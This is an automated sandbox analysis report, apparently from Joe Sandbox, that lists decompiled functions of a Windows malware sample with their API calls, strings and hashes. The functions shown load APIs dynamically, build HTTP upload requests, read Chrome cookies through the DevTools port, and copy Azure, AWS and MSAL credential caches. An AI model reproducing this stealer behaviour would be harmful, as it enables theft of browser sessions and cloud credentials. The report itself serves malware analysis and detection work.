Opcode Fuzzy Hash: eef6dc271c99be91049fa09db95f5eb5d11b7647e75994769f64c49614bb4fd0
Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69

Function 00419BB0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,02CC11C0), ref: 00419BF1
GetProcAddress.KERNEL32(77190000,02CC11D8), ref: 00419C0A
GetProcAddress.KERNEL32(77190000,02CC11F0), ref: 00419C22
GetProcAddress.KERNEL32(77190000,02CC1388), ref: 00419C3A
GetProcAddress.KERNEL32(77190000,02CC13B8), ref: 00419C53
GetProcAddress.KERNEL32(77190000,02D3E0E8), ref: 00419C6B
GetProcAddress.KERNEL32(77190000,02D3B198), ref: 00419C83
GetProcAddress.KERNEL32(77190000,02D3B2F8), ref: 00419C9C
GetProcAddress.KERNEL32(77190000,02CC1358), ref: 00419CB4
GetProcAddress.KERNEL32(77190000,02CC13A0), ref: 00419CCC
GetProcAddress.KERNEL32(77190000,02CC13D0), ref: 00419CE5
GetProcAddress.KERNEL32(77190000,02CC13E8), ref: 00419CFD
GetProcAddress.KERNEL32(77190000,02D3B1B8), ref: 00419D15
GetProcAddress.KERNEL32(77190000,02CC1400), ref: 00419D2E
GetProcAddress.KERNEL32(77190000,02CC1370), ref: 00419D46
GetProcAddress.KERNEL32(77190000,02D3B318), ref: 00419D5E
GetProcAddress.KERNEL32(77190000,02CC1418), ref: 00419D77
GetProcAddress.KERNEL32(77190000,02D3E460), ref: 00419D8F
GetProcAddress.KERNEL32(77190000,02D3B218), ref: 00419DA7
GetProcAddress.KERNEL32(77190000,02D3E598), ref: 00419DC0
GetProcAddress.KERNEL32(77190000,02D3B518), ref: 00419DD8
LoadLibraryA.KERNEL32(02D3E3D0,?,00416CA0), ref: 00419DEA
LoadLibraryA.KERNEL32(02D3E4F0,?,00416CA0), ref: 00419DFB
LoadLibraryA.KERNEL32(02D3E448,?,00416CA0), ref: 00419E0D
LoadLibraryA.KERNEL32(02D3E478,?,00416CA0), ref: 00419E1F
LoadLibraryA.KERNEL32(02D3E6A0,?,00416CA0), ref: 00419E30
GetProcAddress.KERNEL32(76850000,02D3E490), ref: 00419E52
GetProcAddress.KERNEL32(77040000,02D3E4A8), ref: 00419E73
GetProcAddress.KERNEL32(77040000,02D3E418), ref: 00419E8B
GetProcAddress.KERNEL32(75A10000,02D3E5C8), ref: 00419EAD
GetProcAddress.KERNEL32(75690000,02D3B338), ref: 00419ECE
GetProcAddress.KERNEL32(776F0000,02D3E0C8), ref: 00419EEF
GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00419F06

Strings

F(t, xrefs: 00419E91
NtQueryInformationProcess, xrefs: 00419EFA

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: F(t$NtQueryInformationProcess
API String ID: 2238633743-4113152680
Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

lstrlenA.KERNEL32(00000000), ref: 004051E3

Part of subcall function 00419030: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
StrCmpCA.SHLWAPI(?,02D471B0), ref: 00405275
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
HttpOpenRequestA.WININET(00000000,02D47210,?,02D465D8,00000000,00000000,00400100,00000000), ref: 004053F4

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,02D47220,00000000,?,02D41CD0,00000000,?,00421B0C,00000000,?,0041541F), ref: 00405787
lstrlenA.KERNEL32(00000000), ref: 0040579B
GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
HeapAlloc.KERNEL32(00000000), ref: 004057B3
lstrlenA.KERNEL32(00000000), ref: 004057C8
memcpy.MSVCRT(?,00000000,00000000), ref: 004057DF
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
memcpy.MSVCRT(?), ref: 00405806
lstrlenA.KERNEL32(00000000), ref: 00405818
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
memcpy.MSVCRT(?), ref: 00405841
lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
InternetCloseHandle.WININET(00000000), ref: 00405901
InternetCloseHandle.WININET(00000000), ref: 0040590E
InternetCloseHandle.WININET(00000000), ref: 00405918

Strings

------, xrefs: 00405549
------, xrefs: 0040568B
------, xrefs: 004052E7
", xrefs: 004054D2
", xrefs: 00405756
", xrefs: 00405614
--, xrefs: 004052D0
------, xrefs: 00405407

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: d3d9097a6bf80a13b503b743d49033837452c250d74c7dd859e4065b0923fd73
Instruction ID: 17d44de56e64bdd087ca749706e31b97a9426ac18b0a434e790be536538602ee
Opcode Fuzzy Hash: d3d9097a6bf80a13b503b743d49033837452c250d74c7dd859e4065b0923fd73
Instruction Fuzzy Hash: 34321071A22118ABCB14EBA1DC65FEE7379BF54714F00419EF10662092EF387A98CF59

Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
StrCmpCA.SHLWAPI(?,02D471B0), ref: 00405A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02D471C0,00000000,?,02D41CD0,00000000,?,00421B4C), ref: 00405EC1
lstrlenA.KERNEL32(00000000), ref: 00405ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
HeapAlloc.KERNEL32(00000000), ref: 00405EEA
lstrlenA.KERNEL32(00000000), ref: 00405EFF
memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
lstrlenA.KERNEL32(00000000), ref: 00405F28
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
memcpy.MSVCRT(?), ref: 00405F4E
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
InternetCloseHandle.WININET(00000000), ref: 00406000
InternetCloseHandle.WININET(00000000), ref: 0040600D
HttpOpenRequestA.WININET(00000000,02D47210,?,02D465D8,00000000,00000000,00400100,00000000), ref: 00405C48

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00406017

Strings

S`A, xrefs: 00405A0F, 004060B7, 00405A97, 00405AA0, 00405B0E, 00405B85, 00405C83, 00405DC4, 00405B11, 00405B88, 00405C86, 00405DC7
", xrefs: 00405D25
S`A, xrefs: 004060CA
", xrefs: 00405E66
------, xrefs: 00405C5B
------, xrefs: 00405AE6
------, xrefs: 00405D9C

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$S`A$S`A
API String ID: 1406981993-1449208648
Opcode ID: 0cdd346566d0592c13697eaad8dd20855eaf89da358be815ae3b61c0dcf10184
Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
Opcode Fuzzy Hash: 0cdd346566d0592c13697eaad8dd20855eaf89da358be815ae3b61c0dcf10184
Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59

Function 00409BE0 Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 141
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A

memset.MSVCRT ref: 00409C33
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
connect_to_websocket.CHROME(?,00000000), ref: 00409C76
memset.MSVCRT ref: 00409C9A
lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
lstrcatA.KERNEL32(?,?), ref: 00409CD5
lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
lstrcatA.KERNEL32(?,?), ref: 00409CFB
lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
lstrlenA.KERNEL32(00000000), ref: 00409D17
lstrlenA.KERNEL32(00000000), ref: 00409D26

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memset.MSVCRT ref: 00409D7E
free_result.CHROME(00000000), ref: 00409D8B

Strings

/devtools, xrefs: 00409C0B
ws://localhost:9229, xrefs: 00409C3C
cookies, xrefs: 00409CA3
.txt, xrefs: 00409D01
localhost, xrefs: 00409BF5

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrlen$InternetOpenconnect_to_websocketfree_resultlstrcpy
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 2548846003-3542011879
Opcode ID: 7a94d6da22ee99872fb357c36f1c94d8519fed630600dd7db316d96b3072233e
Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
Opcode Fuzzy Hash: 7a94d6da22ee99872fb357c36f1c94d8519fed630600dd7db316d96b3072233e
Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69

Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00414FD7

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00415000
lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

memset.MSVCRT ref: 00415063
lstrcatA.KERNEL32(?,00000000), ref: 0041508C
lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

memset.MSVCRT ref: 004150EF
lstrcatA.KERNEL32(?,00000000), ref: 00415118
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,02D471A0,?,000003E8), ref: 00414C9A
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81

memset.MSVCRT ref: 0041517B

Strings

msal.cache, xrefs: 00415140
\.aws\, xrefs: 0041509D
Azure\.IdentityService, xrefs: 0041513B
\.azure\, xrefs: 00415011
\.IdentityService\, xrefs: 00415129
Azure\.azure, xrefs: 00415023
*.*, xrefs: 00415028
Azure\.aws, xrefs: 004150AF
*.*, xrefs: 004150B4

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-974132213
Opcode ID: b6f365b8ddac4eef2b4e7e17f3272419ae6c6a6b72212baeece01ffa6cdcf182
Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
Opcode Fuzzy Hash: b6f365b8ddac4eef2b4e7e17f3272419ae6c6a6b72212baeece01ffa6cdcf182
Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A

Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D41C70,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
RtlAllocateHeap.NTDLL(00000000), ref: 0040D1CE
lstrcatA.KERNEL32(?,00000000,02D3E128,0042156C,02D3E128,00421568,00000000), ref: 0040D308
lstrcatA.KERNEL32(?,00421570), ref: 0040D317
lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
lstrcatA.KERNEL32(?,00421574), ref: 0040D339
lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
lstrcatA.KERNEL32(?,00000000), ref: 0040D390
lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D3E158,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

lstrlenA.KERNEL32(?), ref: 0040D42A
lstrlenA.KERNEL32(?), ref: 0040D439
memset.MSVCRT ref: 0040D488

Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F

DeleteFileA.KERNEL32(00000000), ref: 0040D4B4

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: d79df489d8ca3538f6dae537c114a75f2acb18fc0a13ae8609abf17ffc193b8d
Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
Opcode Fuzzy Hash: d79df489d8ca3538f6dae537c114a75f2acb18fc0a13ae8609abf17ffc193b8d
Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
StrCmpCA.SHLWAPI(?,02D471B0), ref: 0040498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,02D471E0), ref: 00404E38
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
InternetCloseHandle.WININET(00000000), ref: 00404EFD
InternetCloseHandle.WININET(00000000), ref: 00404F15
